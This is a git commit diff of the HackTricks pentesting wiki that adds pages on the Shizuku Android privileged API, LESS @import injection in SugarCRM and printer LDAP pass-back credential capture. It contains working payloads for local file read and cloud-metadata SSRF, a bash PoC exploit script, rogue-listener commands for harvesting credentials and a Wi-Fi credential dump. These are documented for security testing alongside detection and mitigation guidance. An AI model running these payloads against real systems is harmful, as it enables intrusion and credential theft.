Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

2025-10-10 18:36:50 +00:00 · 2025-07-15 18:58:40 +02:00 · 2025-07-15 18:58:40 +02:00 · b3cf1aa280
commit b3cf1aa280
parent b009499d3d 13eb306dcf
9 changed files with 299 additions and 33 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -337,6 +337,7 @@
  - [Manual DeObfuscation](mobile-pentesting/android-app-pentesting/manual-deobfuscation.md)
  - [React Native Application](mobile-pentesting/android-app-pentesting/react-native-application.md)
  - [Reversing Native Libraries](mobile-pentesting/android-app-pentesting/reversing-native-libraries.md)
  - [Shizuku Privileged Api](mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md)
  - [Smali - Decompiling, Modifying, Compiling](mobile-pentesting/android-app-pentesting/smali-changes.md)
  - [Spoofing your location in Play Store](mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md)
  - [Tapjacking](mobile-pentesting/android-app-pentesting/tapjacking.md)
@ -544,6 +545,7 @@
 # 🕸️ Pentesting Web
 - [Less Code Injection Ssrf](pentesting-web/less-code-injection-ssrf.md)
 - [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
 - [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
  - [Web Vulns List](pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md)
--- a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
+++ b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p
 * NexMon Magisk ZIP or self-compiled patch providing:
  * `/system/lib*/libnexmon.so`
  * `/system/xbin/nexutil`
-* Hijacker ≥ 1.7 (arm/arm64) – https://github.com/chrisk44/Hijacker
+* Hijacker ≥ 1.7 (arm/arm64) – [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker)
 * (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools
 ---
@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2-
 * [NexMon – firmware patching framework](https://github.com/seemoo-lab/nexmon)
 * [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker)
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/mobile-pentesting/android-app-pentesting/README.md
+++ b/src/mobile-pentesting/android-app-pentesting/README.md
@ -25,6 +25,7 @@ Sometimes it is interesting to **modify the application code** to access **hidde
 ## Other interesting tricks
 - [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
 - [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
 - **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
 - Extract APK from device:
--- a/src/mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md
+++ b/src/mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md
@ -0,0 +1,127 @@
 # Shizuku Privileged API
 {{#include ../../banners/hacktricks-training.md}}
 Shizuku is an open–source service that **spawns a privileged Java process using `app_process`** and exposes selected **Android system APIs over Binder**.  
 Because the process is launched with the same **`shell` UID capabilities that ADB uses**, any application (or terminal) that binds to the exported AIDL interface can perform many actions that normally require **`WRITE_SECURE_SETTINGS`, `INSTALL_PACKAGES`, file I/O inside `/data`,** etc. – **without rooting the device**.
 Typical use cases:
 * Security auditing from an un-rooted handset
 * Removing bloatware / debloating system apps
 * Collecting logs, Wi-Fi keys, process and socket information for blue-team/DFIR
 * Automating device configuration from custom apps or shell scripts
 ---
 ## 1. Starting the privileged service
 `moe.shizuku.privileged.api` can be started in three different ways – the resulting Binder service behaves the same in all of them.
 ### 1.1 Wireless ADB (Android 11+)
 1. Enable **Developer Options ➜ Wireless debugging** and pair the device.
 2. Inside the Shizuku app select **“Start via Wireless debugging”** and copy the pairing code.
 3. The service survives until the next reboot (wireless-debugging sessions are cleared on boot).
 ### 1.2 USB / local ADB one-liner
 ```bash
 adb push start.sh \
  /storage/emulated/0/Android/data/moe.shizuku.privileged.api/
 # spawn the privileged process
 adb shell sh /storage/emulated/0/Android/data/moe.shizuku.privileged.api/start.sh
 ```
 The same script can be executed over a **network ADB** connection (`adb connect <IP>:5555`).
 ### 1.3 Rooted devices
 If the device is already rooted run:
 ```bash
 su -c sh /data/adb/shizuku/start.sh
 ```
 ### 1.4 Verifying that it is running
 ```bash
 adb shell dumpsys activity service moe.shizuku.privileged.api | head
 ```
 A successful start returns `Running services (1)` together with the PID of the privileged process.
 ---
 ## 2. Binding from an application
 Third-party apps only need the following inside their `AndroidManifest.xml`:
 ```xml
 <uses-permission android:name="moe.shizuku.manager.permission.API"/>
 ```
 At runtime they obtain the binder:
 ```java
 IBinder binder = ShizukuProvider.getBinder();
 IPackageManager pm  = IPackageManager.Stub.asInterface(binder);
 ```
 From this moment the app can invoke any method that the **`shell` user** may call – for example :
 ```java
 pm.installPackage(new Uri("file:///sdcard/app.apk"), null, 0, null);
 Settings.Global.putInt(resolver, Settings.Global.ADB_ENABLED, 1);
 ```
 A curated list of more than **170 Shizuku-enabled apps** is maintained at [awesome-shizuku](https://github.com/timschneeb/awesome-shizuku).
 ---
 ## 3. Rish – elevated shell inside Termux
 The Shizuku settings screen exposes **“Use Shizuku in terminal apps”**. Enabling it downloads *rish* (`/data/local/tmp/rish`).
 ```bash
 pkg install wget
 wget https://rikka.app/rish/latest -O rish && chmod +x rish
 # start elevated shell (inherits the binder connection)
 ./rish
 whoami   #  ➜  shell
 id       #  uid=2000(shell) gid=2000(shell) groups=... context=u:r:shell:s0
 ```
 ### 3.1 Useful commands from the rish shell
 * List running processes of a given package:
  ```bash
  ps -A | grep com.facebook.katana
  ```
 * Enumerate listening sockets and map them to packages (e.g. **CVE-2019-6447 ES File Explorer**):
  ```bash
  netstat -tuln
  for pid in $(lsof -nP -iTCP -sTCP:LISTEN -t); do
      printf "%s -> %s\n" "$pid" "$(cat /proc/$pid/cmdline)";
  done
  ```
 * Dump every application’s logs:
  ```bash
  logcat -d | grep -iE "(error|exception)"
  ```
 * Read stored Wi-Fi credentials (Android 11 +):
  ```bash
  cat /data/misc/wifi/WifiConfigStore.xml | grep -i "<ConfigKey>"
  ```
 * Bulk debloat (example):
  ```bash
  pm uninstall --user 0 com.miui.weather2
  ```
 ---
 ## 4. Security considerations / detection
 1. Shizuku needs **ADB debugging** privileges, therefore _Developer Options → USB/Wireless debugging_ must be **enabled**.  
   Organisations can block this through an MDM or via `settings put global development_settings_enabled 0`.
 2. The service registers itself under the name `moe.shizuku.privileged.api`.  
   A simple `adb shell service list | grep shizuku` (or Endpoint Security rule) detects its presence.
 3. Capabilities are limited to what the `shell` user can already do – it is **not root**.  
   Sensitive APIs that require the `system` or `root` user are still inaccessible.
 4. Sessions do **not survive a reboot** unless the device is rooted and Shizuku is configured as a startup daemon.
 ---
 ## 5. Mitigation
 * Disable USB/Wireless debugging on production devices.
 * Monitor for Binder services exposing `moe.shizuku.privileged.api`.
 * Use SELinux policies (Android enterprise) to block the AIDL interface from unmanaged applications.
 ---
 ## References
 - [Blog – Shizuku: Unlocking Advanced Android Capabilities Without Root](https://www.mobile-hacker.com/2025/07/14/shizuku-unlocking-advanced-android-capabilities-without-root/)
 - [Shizuku Official Documentation](https://shizuku.rikka.app/)
 - [awesome-shizuku – list of supported apps](https://github.com/timschneeb/awesome-shizuku)
 - [rish shell (privileged reverse-adb shell)](https://github.com/RikkaApps/Shizuku/blob/master/RISH.md)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 ### Automated dynamic analysis with MobSF (no jailbreak)
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest
--- a/src/network-services-pentesting/pentesting-telnet.md
+++ b/src/network-services-pentesting/pentesting-telnet.md
@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with
-{{#include /banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
--- a/src/pentesting-web/less-code-injection-ssrf.md
+++ b/src/pentesting-web/less-code-injection-ssrf.md
@ -0,0 +1,81 @@
 # LESS Code Injection leading to SSRF & Local File Read
 {{#include ../banners/hacktricks-training.md}}
 ## Overview
 LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
 When an application concatenates **user-controlled input** into a string that is later parsed by the LESS compiler, an attacker can **inject arbitrary LESS code**.  By abusing `@import (inline)` the attacker can force the server to retrieve:
 * Local files via the `file://` protocol (information disclosure / Local File Inclusion).
 * Remote resources on internal networks or cloud metadata services (SSRF).
 This technique has been seen in real-world products such as **SugarCRM ≤ 14.0.0** (`/rest/v10/css/preview` endpoint).
 ## Exploitation
 1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. `?lm=` in SugarCRM).
 2. Close the current statement and inject new directives.  The most common primitives are:
   * `;`  – terminates the previous declaration.
   * `}`  – closes the previous block (if required).
 3. Use `@import (inline) '<URL>';` to read arbitrary resources.
 4. Optionally inject a **marker** (`data:` URI) after the import to ease extraction of the fetched content from the compiled CSS.
 ### Local File Read
 ```
 1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //
 ```
 The contents of `/etc/passwd` will appear in the HTTP response just before the `@@END@@` marker.
 ### SSRF – Cloud Metadata
 ```
 1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //
 ```
 ### Automated PoC (SugarCRM example)
 ```bash
 #!/usr/bin/env bash
 # Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd
 TARGET="$1"        # Base URL of SugarCRM instance
 RESOURCE="$2"      # file:// path or URL to fetch
 INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")
 curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
  sed -n 's/.*@@END@@\(.*\)/\1/p'
 ```
 ## Detection
 * Look for dynamically generated `.less` or `.css` responses containing unsanitised query parameters.
 * During code review, search for constructions like `"@media all { .preview { ... ${userInput} ... } }"` passed to LESS render functions.
 * Exploit attempts often include `@import`, `(inline)`, `file://`, `http://169.254.169.254`, etc.
 ## Mitigations
 * Do **not** pass untrusted data to the LESS compiler.
 * If dynamic values are required, properly **escape**/sanitize them (e.g., restrict to numeric tokens, whitelists).
 * Disable, when possible, the ability to use `(inline)` imports, or limit allowed protocols to `https`.
 * Keep dependencies up to date – SugarCRM patched this issue in versions 13.0.4 and 14.0.1.
 ## Real-World Cases
 | Product | Vulnerable Endpoint | Impact |
 |---------|--------------------|--------|
 | SugarCRM ≤ 14.0.0 | `/rest/v10/css/preview?lm=` | Unauthenticated SSRF & local file read |
 ## References
 * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
 * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
 * [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
 {{#include ../banners/hacktricks-training.md}}
--- a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
@ -4,6 +4,12 @@
 Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**
 - SugarCRM ≤ 14.0.0 – LESS `@import` injection in `/rest/v10/css/preview` enables unauthenticated SSRF & local file read.
 {{#ref}}
 ../less-code-injection-ssrf.md
 {{#endref}}
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
+++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
@ -2,60 +2,109 @@
 {{#include ../../banners/hacktricks-training.md}}
-There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.\
+There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.  \
-This is because an attacker could **trick the printer to authenticate against a rouge LDAP server** (typically a `nc -vv -l -p 444` is enough) and to capture the printer **credentials on clear-text**.
+This is because an attacker could **trick the printer to authenticate against a rogue LDAP server** (typically a `nc -vv -l -p 389` or `slapd -d 2` is enough) and capture the printer **credentials in clear-text**.
-Also, several printers will contains **logs with usernames** or could even be able to **download all usernames** from the Domain Controller.
+Also, several printers will contain **logs with usernames** or could even be able to **download all usernames** from the Domain Controller.
 All this **sensitive information** and the common **lack of security** makes printers very interesting for attackers.
-Some blogs about the topic:
+Some introductory blogs about the topic:
 - [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/)
 - [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
 ---
 ## Printer Configuration
- **Location**: The LDAP server list is found at: `Network > LDAP Setting > Setting Up LDAP`.
+- **Location**: The LDAP server list is usually found in the web interface (e.g. *Network ➜ LDAP Setting ➜ Setting Up LDAP*).
- **Behavior**: The interface allows LDAP server modifications without re-entering credentials, aiming for user convenience but posing security risks.
+- **Behavior**: Many embedded web servers allow LDAP server modifications **without re-entering credentials** (usability feature → security risk).
- **Exploit**: The exploit involves redirecting the LDAP server address to a controlled machine and leveraging the "Test Connection" feature to capture credentials.
+- **Exploit**: Redirect the LDAP server address to an attacker-controlled host and use the *Test Connection* / *Address Book Sync* button to force the printer to bind to you.
 ---
 ## Capturing Credentials
-**For more detailed steps, refer to the original [source](https://grimhacker.com/2018/03/09/just-a-printer/).**
+### Method 1 – Netcat Listener
 ### Method 1: Netcat Listener
 A simple netcat listener might suffice:
 ```bash
-sudo nc -k -v -l -p 386
+sudo nc -k -v -l -p 389     # LDAPS → 636 (or 3269)
 ```
-However, this method's success varies.
+Small/old MFPs may send a simple *simple-bind* in clear-text that netcat can capture. Modern devices usually perform an anonymous query first and then attempt the bind, so results vary.
-### Method 2: Full LDAP Server with Slapd
+### Method 2 – Full Rogue LDAP server (recommended)
-A more reliable approach involves setting up a full LDAP server because the printer performs a null bind followed by a query before attempting credential binding.
+Because many devices will issue an anonymous search *before* authenticating, standing up a real LDAP daemon yields much more reliable results:
 1. **LDAP Server Setup**: The guide follows steps from [this source](https://www.server-world.info/en/note?os=Fedora_26&p=openldap).
 2. **Key Steps**:
   - Install OpenLDAP.
   - Configure admin password.
   - Import basic schemas.
   - Set domain name on LDAP DB.
   - Configure LDAP TLS.
 3. **LDAP Service Execution**: Once set up, the LDAP service can be run using:
 ```bash
-slapd -d 2
+# Debian/Ubuntu example
 sudo apt install slapd ldap-utils
 sudo dpkg-reconfigure slapd   # set any base-DN – it will not be validated
 # run slapd in foreground / debug 2
 slapd -d 2 -h "ldap:///"      # only LDAP, no LDAPS
 ```
 When the printer performs its lookup you will see the clear-text credentials in the debug output.
 > 💡  You can also use `impacket/examples/ldapd.py` (Python rogue LDAP) or `Responder -w -r -f` to harvest NTLMv2 hashes over LDAP/SMB.
 ---
 ## Recent Pass-Back Vulnerabilities (2024-2025)
 Pass-back is *not* a theoretical issue – vendors keep publishing advisories in 2024/2025 that exactly describe this attack class.
 ### Xerox VersaLink – CVE-2024-12510 & CVE-2024-12511
 Firmware ≤ 57.69.91 of Xerox VersaLink C70xx MFPs allowed an authenticated admin (or anyone when default creds remain) to:
 * **CVE-2024-12510 – LDAP pass-back**: change the LDAP server address and trigger a lookup, causing the device to leak the configured Windows credentials to the attacker-controlled host.
 * **CVE-2024-12511 – SMB/FTP pass-back**: identical issue via *scan-to-folder* destinations, leaking NetNTLMv2 or FTP clear-text creds.
 A simple listener such as:
 ```bash
 sudo nc -k -v -l -p 389     # capture LDAP bind
 ```
 or a rogue SMB server (`impacket-smbserver`) is enough to harvest the credentials.  
 ### Canon imageRUNNER / imageCLASS – Advisory 20 May 2025
 Canon confirmed a **SMTP/LDAP pass-back** weakness in dozens of Laser & MFP product lines. An attacker with admin access can modify the server configuration and retrieve the stored credentials for LDAP **or** SMTP (many orgs use a privileged account to allow scan-to-mail).  
 The vendor guidance explicitly recommends:
 1. Updating to patched firmware as soon as available.
 2. Using strong, unique admin passwords.
 3. Avoiding privileged AD accounts for printer integration.
 ---
 ## Automated Enumeration / Exploitation Tools
 | Tool | Purpose | Example |
 |------|---------|---------|
 | **PRET** (Printer Exploitation Toolkit) | PostScript/PJL/PCL abuse, file-system access, default-creds check, *SNMP discovery* | `python pret.py 192.168.1.50 pjl` |
 | **Praeda** | Harvest configuration (including address books & LDAP creds) via HTTP/HTTPS | `perl praeda.pl -t 192.168.1.50` |
 | **Responder / ntlmrelayx** | Capture & relay NetNTLM hashes from SMB/FTP pass-back | `responder -I eth0 -wrf` |
 | **impacket-ldapd.py** | Lightweight rogue LDAP service to receive clear-text binds | `python ldapd.py -debug` |
 ---
 ## Hardening & Detection
 1. **Patch / firmware-update** MFPs promptly (check vendor PSIRT bulletins).
 2. **Least-Privilege Service Accounts** – never use Domain Admin for LDAP/SMB/SMTP; restrict to *read-only* OU scopes.
 3. **Restrict Management Access** – place printer web/IPP/SNMP interfaces in a management VLAN or behind an ACL/VPN.
 4. **Disable Unused Protocols** – FTP, Telnet, raw-9100, older SSL ciphers.
 5. **Enable Audit Logging** – some devices can syslog LDAP/SMTP failures; correlate unexpected binds.
 6. **Monitor for Clear-Text LDAP binds** on unusual sources (printers should normally talk only to DCs).
 7. **SNMPv3 or disable SNMP** – community `public` often leaks device & LDAP config.
 ---
 ## References
 - [https://grimhacker.com/2018/03/09/just-a-printer/](https://grimhacker.com/2018/03/09/just-a-printer/)
 - Rapid7. “Xerox VersaLink C7025 MFP Pass-Back Attack Vulnerabilities.” February 2025.  
 - Canon PSIRT. “Vulnerability Mitigation Against SMTP/LDAP Passback for Laser Printers and Small Office Multifunction Printers.” May 2025.
 {{#include ../../banners/hacktricks-training.md}}
`@ -139,4 +139,4 @@ After a shell is obtained remember that TTYs are usually dumb; upgrade with`



	`{{#include /banners/hacktricks-training.md}}`	`{{#include ../banners/hacktricks-training.md}}`